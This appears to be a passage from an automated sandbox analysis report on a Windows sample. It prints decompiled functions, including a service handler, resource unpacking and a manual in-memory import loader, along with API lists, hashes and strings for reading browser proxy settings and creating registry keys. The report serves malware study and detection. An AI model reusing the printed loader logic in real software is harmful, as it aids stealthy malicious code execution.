                                                                                                        0x70983d09
                                                                                                        0x70983d10
                                                                                                        0x70983d97
                                                                                                        0x70983da1
                                                                                                        0x70983da8
                                                                                                        0x70983da8
                                                                                                        0x70983d12
                                                                                                        0x70983d16
                                                                                                        0x70983d20
                                                                                                        0x70983d23
                                                                                                        0x70983d44
                                                                                                        0x70983d4f
                                                                                                        0x70983d57
                                                                                                        0x70983d59
                                                                                                        0x70983d69
                                                                                                        0x70983d72
                                                                                                        0x70983d72
                                                                                                        0x70983d78
                                                                                                        0x70983d7a
                                                                                                        0x70983d82
                                                                                                        0x70983d87
                                                                                                        0x70983d8b
                                                                                                        0x70983d8b
                                                                                                        0x70983d25
                                                                                                        0x70983d28
                                                                                                        0x00000000
                                                                                                        0x70983d30
                                                                                                        0x70983d30
                                                                                                        0x70983d30
                                                                                                        0x70983d37
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983d3f
                                                                                                        0x70983d42
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983d42
                                                                                                        0x00000000
                                                                                                        0x70983d30

                                                                                                        APIs
                                                                                                        • SetCurrentDirectoryW.KERNEL32(00A4B6C8), ref: 70983CB8
                                                                                                        • RegisterServiceCtrlHandlerExW.ADVAPI32(?,70983BC0,00000000), ref: 70983D03
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004,?,70983BC0,00000000), ref: 70983D48
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,70983BC0,00000000), ref: 70983D4F
                                                                                                        • CreateThread.KERNEL32 ref: 70983D6B
                                                                                                        • CloseHandle.KERNEL32(00000000,?,70983BC0,00000000), ref: 70983D72
                                                                                                        • SetServiceStatus.ADVAPI32(00000000,7098F4EC,?,70983BC0,00000000), ref: 70983DA1
                                                                                                        • ExitProcess.KERNEL32 ref: 70983DA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: HeapProcessService$AllocCloseCreateCtrlCurrentDirectoryExitHandleHandlerRegisterStatusThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2085172483-0
                                                                                                        • Opcode ID: 4303ca504aa8bdcbcbe9850aa6e300b1ee01a403f56256e620dd19387c1f8d42
                                                                                                        • Instruction ID: a9d2f05a6b14acc3e483df01efba6a5d1d876813d7682430fdb3ea82a5849700
                                                                                                        • Opcode Fuzzy Hash: 4303ca504aa8bdcbcbe9850aa6e300b1ee01a403f56256e620dd19387c1f8d42
                                                                                                        • Instruction Fuzzy Hash: 822127B2528201AFC3108F66CCACB1ABBB9FBE5704F30952AE556C73E1E7719444EB11
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985180, Relevance: 12.1, APIs: 8, Instructions: 63memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70985180(struct HINSTANCE__* _a4, WCHAR* _a8) {
				signed int _t20;
				struct HINSTANCE__* _t22;
				int _t23;
				struct HRSRC__* _t28;
				void* _t29;
				void* _t30;
				void* _t32;

				_t22 = _a4;
				_t30 = 0;
				_t28 = FindResourceW(_t22, _a8, 5);
				if(_t28 == 0) {
					return 0;
				} else {
					_t32 = LoadResource(_t22, _t28);
					if(_t32 != 0) {
						_t23 = SizeofResource(_t22, _t28);
						_t29 = LockResource(_t32);
						if(_t29 != 0) {
							_t30 = HeapAlloc(GetProcessHeap(), 8, _t23);
							RtlMoveMemory(_t30, _t29, _t23);
							_t20 =  *(_t30 + 0xc);
							if((_t20 & 0x40000000) == 0) {
								 *(_t30 + 8) =  *(_t30 + 8) & 0xfffbffff | 0x08000080;
							}
							 *(_t30 + 0xc) = _t20 & 0xefffffff;
							 *((intOrPtr*)(_t30 + 0x16)) = 0;
						}
						FreeResource(_t32);
					}
					return _t30;
				}
			}










                                                                                                        0x70985185
                                                                                                        0x7098518f
                                                                                                        0x70985197
                                                                                                        0x7098519b
                                                                                                        0x70985219
                                                                                                        0x7098519d
                                                                                                        0x709851a6
                                                                                                        0x709851aa
                                                                                                        0x709851b5
                                                                                                        0x709851bd
                                                                                                        0x709851c1
                                                                                                        0x709851d4
                                                                                                        0x709851d8
                                                                                                        0x709851dd
                                                                                                        0x709851e5
                                                                                                        0x709851f6
                                                                                                        0x709851f6
                                                                                                        0x70985200
                                                                                                        0x70985203
                                                                                                        0x70985203
                                                                                                        0x70985207
                                                                                                        0x70985207
                                                                                                        0x70985213
                                                                                                        0x70985213

                                                                                                        APIs
                                                                                                        • FindResourceW.KERNEL32(?,?,00000005), ref: 70985191
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 709851A0
                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 709851AE
                                                                                                        • LockResource.KERNEL32(00000000), ref: 709851B7
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 709851C6
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 709851CD
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 709851D8
                                                                                                        • FreeResource.KERNEL32(00000000), ref: 70985207
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Heap$AllocFindFreeLoadLockMemoryMoveProcessSizeof
                                                                                                        • String ID:
                                                                                                        • API String ID: 1815471765-0
                                                                                                        • Opcode ID: 59389aa4ad180812beb69e08862541f717c9222e2f6741eb5186cb0f5518b736
                                                                                                        • Instruction ID: a935ecb3cac7ccc9a02ff2a805a1808a0a525c07c4d05176d0ca808941831964
                                                                                                        • Opcode Fuzzy Hash: 59389aa4ad180812beb69e08862541f717c9222e2f6741eb5186cb0f5518b736
                                                                                                        • Instruction Fuzzy Hash: 811173B32057016FD3105BAA9C8CF5BBBADEB85761B10452DF526C2391DA34D8008B60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00503DA9, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 234COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00503DB7
                                                                                                        • _malloc.LIBCMT ref: 00503DCB
                                                                                                          • Part of subcall function 00537172: __FF_MSGBANNER.LIBCMT ref: 00537195
                                                                                                          • Part of subcall function 00537172: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00540F49,?,00000001,?,00544586,00000018,007D5C28,0000000C,00544615,?), ref: 005371EA
                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004EA1FF,00000004,004E8E44,0000002C,004E9245,?,?,?,00000000,?,?), ref: 004A17A0
                                                                                                          • Part of subcall function 004A1957: __EH_prolog3.LIBCMT ref: 004A195E
                                                                                                          • Part of subcall function 004A1957: InitializeCriticalSection.KERNEL32(?,00000004,004C8906,' not found,00000000,?), ref: 004A1973
                                                                                                          • Part of subcall function 004A1957: _strlen.LIBCMT ref: 004A198C
                                                                                                          • Part of subcall function 004A1957: _mbstowcs.LIBCMT ref: 004A19A7
                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004E90F2,00000000,?,?,?,?,?,?,?,?,Default,?,?), ref: 004A1C05
                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,Default,?,?,?,?,00000000,?,?), ref: 004A1C45
                                                                                                          • Part of subcall function 004A1C93: __EH_prolog3.LIBCMT ref: 004A1C9A
                                                                                                          • Part of subcall function 004A1C93: EnterCriticalSection.KERNEL32(?,00000004,004A3359,00000008,004B9859,?,?,?,?,?,?,?,?,?,?,00000068), ref: 004A1CA8
                                                                                                          • Part of subcall function 004A1C93: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000068), ref: 004A1CC9
                                                                                                          • Part of subcall function 0050390E: __EH_prolog3.LIBCMT ref: 00503915
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$H_prolog3$EnterInitializeLeave$AllocateH_prolog3_catchHeap_malloc_mbstowcs_strlen
                                                                                                        • String ID: 0123456789$\prefs.js$network.proxy.http$network.proxy.http_port
                                                                                                        • API String ID: 46851792-787808601
                                                                                                        • Opcode ID: cb0308b45ff5fa1012e4a0ab40a06299157a6f729a838646512a528bc0bf7ee8
                                                                                                        • Instruction ID: f60bb6b66696505df7779dc03c8615f12482400e6b69656dab82577ade590fd6
                                                                                                        • Opcode Fuzzy Hash: cb0308b45ff5fa1012e4a0ab40a06299157a6f729a838646512a528bc0bf7ee8
                                                                                                        • Instruction Fuzzy Hash: 26A1DE30500288EACF15EB64C856FDD7B79AF22308F1441AEF946671E2DBB89F09CB55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004D8A3D, Relevance: 10.6, APIs: 7, Instructions: 146registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004D8A5C
                                                                                                        • _wcscpy.LIBCMT ref: 004D8AF5
                                                                                                        • _wcscat.LIBCMT ref: 004D8B03
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000003,?), ref: 004D8B22
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000003,?), ref: 004D8B38
                                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00000003,00000000,?,00000000), ref: 004D8B54
                                                                                                        • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000003,00000000,?,00000000), ref: 004D8B6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CreateOpen$H_prolog3_wcscat_wcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 4233506698-0
                                                                                                        • Opcode ID: 05e4341f6ee4ba1fe7da63b75910784175545b105e92622bd9e21829e6d54ec4
                                                                                                        • Instruction ID: af9df4a72677d03553045917ee85afd16f459e38d70657900af2cd083c6ddade
                                                                                                        • Opcode Fuzzy Hash: 05e4341f6ee4ba1fe7da63b75910784175545b105e92622bd9e21829e6d54ec4
                                                                                                        • Instruction Fuzzy Hash: 78515EB290428DAEDB11DB94DD95BFE77BCAB08304F14806FF505A7382EA745F088B65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0050416C, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 144COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 0050417A
                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004EA1FF,00000004,004E8E44,0000002C,004E9245,?,?,?,00000000,?,?), ref: 004A17A0
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004E90F2,00000000,?,?,?,?,?,?,?,?,Default,?,?), ref: 004A1C05
                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,Default,?,?,?,?,00000000,?,?), ref: 004A1C45
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                          • Part of subcall function 00503AC5: __EH_prolog3_catch.LIBCMT ref: 00503AD3
                                                                                                          • Part of subcall function 00503AC5: _malloc.LIBCMT ref: 00503AFA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CriticalH_prolog3Section$Initialize$DeleteEnterH_prolog3_catchLeave_malloc
                                                                                                        • String ID: MOZILLA$NONE$OPERA$ProxySearch: Found setting $TV3REG
                                                                                                        • API String ID: 4144251725-2993174309
                                                                                                        • Opcode ID: 1e46ecfe7c7408d4371aaed47c022c4acd4b081d2c8645b5fa641316cf624b5d
                                                                                                        • Instruction ID: bb87ceb9de428671a06510b63d19646442044be919961f2de3eb51c57445bc14
                                                                                                        • Opcode Fuzzy Hash: 1e46ecfe7c7408d4371aaed47c022c4acd4b081d2c8645b5fa641316cf624b5d
                                                                                                        • Instruction Fuzzy Hash: AB51F4B4904148EADB04FB64C962AED7F74AF31348F14449EF5021B1E2EB386F09CB65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004B4A15, Relevance: 10.6, APIs: 7, Instructions: 142libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(00000002), ref: 004B4A4A
                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 004B4A6C
                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004B4A84
                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000104,00000001), ref: 004B4AA9
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 004B4ABE
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 004B4AC5
                                                                                                          • Part of subcall function 004B48A9: CompareStringA.KERNEL32(00000409,00000001,?,000000FF,?,000000FF,?,004B4B75,?,?,?,?,?,?,?,?), ref: 004B48BF
                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004B4BC5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Module$DirectoryFileLibraryName$CompareFreeHandleLoadStringSystemWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 3624046510-0
                                                                                                        • Opcode ID: 63c86a329f6b61b25f045e0ef86c1f4fa11e1fede295edc5cf73bba4edf7da86
                                                                                                        • Instruction ID: 7bada881394fb758a7ba3291e7c2cee9e8d025cd33408074cb11b271dc47fdee
                                                                                                        • Opcode Fuzzy Hash: 63c86a329f6b61b25f045e0ef86c1f4fa11e1fede295edc5cf73bba4edf7da86
                                                                                                        • Instruction Fuzzy Hash: F751817294412D9ACF21DBA4DC94AEB77BCAF59304F0044E6D549D3102EA34DB888F64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709817B0, Relevance: 10.6, APIs: 7, Instructions: 138memorylibraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E709817B0(void* __edi) {
				struct HINSTANCE__* _v4;
				intOrPtr* _v8;
				intOrPtr _t40;
				intOrPtr _t42;
				struct HINSTANCE__* _t44;
				signed int _t46;
				intOrPtr _t47;
				signed short _t48;
				CHAR* _t49;
				_Unknown_base(*)()* _t51;
				signed int _t53;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				void* _t60;
				intOrPtr* _t67;
				signed short* _t70;
				intOrPtr _t75;
				intOrPtr* _t78;
				void* _t83;
				signed short* _t88;
				void* _t94;
				signed short _t114;

				_t83 = __edi;
				_t40 =  *((intOrPtr*)(__edi + 0xc0));
				if(_t40 == 0 ||  *((intOrPtr*)(__edi + 0xc4)) == 0) {
					return 0;
				} else {
					_t67 =  *((intOrPtr*)(__edi + 0x144)) + _t40;
					_t42 =  *((intOrPtr*)(_t67 + 0xc));
					_v8 = _t67;
					if(_t42 == 0) {
						L30:
						return 0;
					} else {
						_t94 = _v4;
						while(1) {
							_t44 = LoadLibraryA( *((intOrPtr*)(_t83 + 0x144)) + _t42);
							_v4 = _t44;
							if(_t44 == 0) {
								break;
							}
							_t46 =  *(_t83 + 0x154);
							if( *(_t83 + 0x150) < _t46) {
								L16:
								if(_t94 != 0) {
									_t53 =  *(_t83 + 0x150);
									_t54 = _t53 + 1;
									 *(_t83 + 0x150) = _t54;
									if( *((intOrPtr*)(_t94 + _t53 * 4)) != 0) {
										 *((intOrPtr*)(_t94 + _t54 * 4)) = _v4;
										 *(_t83 + 0x150) =  *(_t83 + 0x150) + 1;
									}
								}
								_t47 =  *((intOrPtr*)(_t83 + 0x144));
								_t78 = _v8;
								_t88 =  *((intOrPtr*)(_t67 + 0x10)) + _t47;
								_t70 = _t88;
								if( *((intOrPtr*)(_t78 + 4)) == 0) {
									L22:
									_t48 =  *_t70;
									_t114 = _t48;
									if(_t114 == 0) {
										L29:
										_t42 =  *((intOrPtr*)(_t78 + 0x20));
										_v8 = _t78 + 0x14;
										if(_t42 != 0) {
											_t67 = _v8;
											continue;
										} else {
											goto L30;
										}
									} else {
										L23:
										L23:
										if(_t114 >= 0) {
											_t49 = _t48 +  *((intOrPtr*)(_t83 + 0x144)) + 2;
										} else {
											_t49 = _t48 & 0x0000ffff;
										}
										_t51 = GetProcAddress(_v4, _t49);
										 *_t88 = _t51;
										if(_t51 == 0) {
											break;
										}
										_t48 = _t70[2];
										_t70 =  &(_t70[2]);
										_t88 =  &(_t88[2]);
										if(_t48 != 0) {
											goto L23;
										} else {
											_t78 = _v8;
											goto L29;
										}
									}
								} else {
									_t75 =  *_t78;
									if(_t75 == 0) {
										return 8;
									} else {
										_t70 = _t75 + _t47;
										goto L22;
									}
								}
							} else {
								if(_t46 == 0) {
									_t55 = 0x10;
								} else {
									_t55 = _t46 + _t46;
								}
								 *(_t83 + 0x154) = _t55;
								_t94 = HeapAlloc(GetProcessHeap(), 8, _t55 * 4);
								if(_t94 == 0) {
									return 3;
								} else {
									_t59 =  *(_t83 + 0x150);
									if(_t59 != 0) {
										RtlMoveMemory(_t94,  *(_t83 + 0x14c), _t59 + _t59 + _t59 + _t59);
									}
									_t60 =  *(_t83 + 0x14c);
									if(_t60 != 0) {
										HeapFree(GetProcessHeap(), 0, _t60);
									}
									 *(_t83 + 0x14c) = _t94;
									goto L16;
								}
							}
							goto L35;
						}
						return 6;
					}
				}
				L35:
			}


























                                                                                                        0x709817b0
                                                                                                        0x709817b0
                                                                                                        0x709817bb
                                                                                                        0x70981950
                                                                                                        0x709817ce
                                                                                                        0x709817d5
                                                                                                        0x709817d7
                                                                                                        0x709817dc
                                                                                                        0x709817e2
                                                                                                        0x7098191e
                                                                                                        0x70981926
                                                                                                        0x709817e8
                                                                                                        0x709817e8
                                                                                                        0x709817f4
                                                                                                        0x709817fd
                                                                                                        0x70981803
                                                                                                        0x70981809
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098180f
                                                                                                        0x7098181b
                                                                                                        0x7098188b
                                                                                                        0x7098188d
                                                                                                        0x7098188f
                                                                                                        0x70981899
                                                                                                        0x7098189a
                                                                                                        0x709818a2
                                                                                                        0x709818a8
                                                                                                        0x709818ac
                                                                                                        0x709818ac
                                                                                                        0x709818a2
                                                                                                        0x709818b5
                                                                                                        0x709818bb
                                                                                                        0x709818bf
                                                                                                        0x709818c5
                                                                                                        0x709818c7
                                                                                                        0x709818d2
                                                                                                        0x709818d2
                                                                                                        0x709818d4
                                                                                                        0x709818d6
                                                                                                        0x7098190c
                                                                                                        0x7098190c
                                                                                                        0x70981912
                                                                                                        0x70981918
                                                                                                        0x709817f0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709818d8
                                                                                                        0x00000000
                                                                                                        0x709818d8
                                                                                                        0x709818d8
                                                                                                        0x709818e5
                                                                                                        0x709818da
                                                                                                        0x709818da
                                                                                                        0x709818da
                                                                                                        0x709818ef
                                                                                                        0x709818f5
                                                                                                        0x709818f9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709818fb
                                                                                                        0x709818fe
                                                                                                        0x70981901
                                                                                                        0x70981906
                                                                                                        0x00000000
                                                                                                        0x70981908
                                                                                                        0x70981908
                                                                                                        0x00000000
                                                                                                        0x70981908
                                                                                                        0x70981906
                                                                                                        0x709818c9
                                                                                                        0x709818c9
                                                                                                        0x709818cd
                                                                                                        0x7098193e
                                                                                                        0x709818cf
                                                                                                        0x709818cf
                                                                                                        0x00000000
                                                                                                        0x709818cf
                                                                                                        0x709818cd
                                                                                                        0x7098181d
                                                                                                        0x7098181f
                                                                                                        0x70981825
                                                                                                        0x70981821
                                                                                                        0x70981821
                                                                                                        0x70981821
                                                                                                        0x7098183a
                                                                                                        0x70981849
                                                                                                        0x7098184d
                                                                                                        0x70981932
                                                                                                        0x70981853
                                                                                                        0x70981853
                                                                                                        0x7098185b
                                                                                                        0x7098186a
                                                                                                        0x7098186a
                                                                                                        0x7098186f
                                                                                                        0x70981877
                                                                                                        0x7098187f
                                                                                                        0x7098187f
                                                                                                        0x70981885
                                                                                                        0x00000000
                                                                                                        0x70981885
                                                                                                        0x7098184d
                                                                                                        0x00000000
                                                                                                        0x7098181b
                                                                                                        0x7098194a
                                                                                                        0x7098194a
                                                                                                        0x709817e2
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 709817FD
                                                                                                        • GetProcessHeap.KERNEL32(00000008), ref: 70981840
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70981843
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 7098186A
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 7098187C
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098187F
                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 709818EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
